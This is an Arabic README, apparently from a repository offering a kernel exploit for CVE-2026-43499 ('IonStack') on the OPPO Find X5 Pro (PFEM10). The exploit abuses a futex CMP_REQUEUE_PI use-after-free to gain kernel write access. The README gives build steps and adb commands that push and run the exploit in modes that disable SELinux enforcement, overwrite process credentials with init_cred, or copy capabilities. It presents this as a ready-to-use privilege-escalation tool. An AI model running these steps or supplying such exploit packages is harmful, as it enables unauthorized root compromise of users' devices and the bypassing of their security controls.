
# بحث GhostLock (CVE-2026-43499 / IonStack) لهاتف OPPO Find X5 Pro (PFEM10): سلسلة الاستغلال، التقدم، سجل العوائق، وملاحظات نواة سلسلة OPPO 5
استغلال CVE-2026-43499 (IonStack) لجهاز OPPO Find X5 Pro (PFEM10).
النواة 5.10.236-android12-9-o، futex CMP_REQUEUE_PI UAF → بدائية كتابة pi-tree.
استخدم على مسؤوليتك الخاصة. توقع أعطالًا / إعادة تشغيل. لا تقم بتحديث البرنامج الثابت.
./build.sh # يتطلب Android NDK r28c
معاملات البناء ثابتة (-O1 / android26) — تغييرها يكسر معايرة هندسة المكدس.
adb push exploit /data/local/tmp/
adb shell /data/local/tmp/exploit W1 # SELinux permissive
adb shell /data/local/tmp/exploit W2 # child cred -> init_cred
adb shell /data/local/tmp/exploit W5 # caps-only cred copy
أعد المحاولة عبر إعادة التشغيل: bash run.sh <mode> [attempts]
src/ الاستغلال + الحمولة + الإزاحات (exploit.c, payload.c, pfem10_target.h)
lib/ مكتبة تسريب الكومة KernelSnitch
model/ نموذج اجتياز سلسلة rtmutex (تحقق على المضيف)
oplus_root_check، مسار caps-only قيد التطوير)CyberMeowfia · IonStack (الاستغلال الأصلي)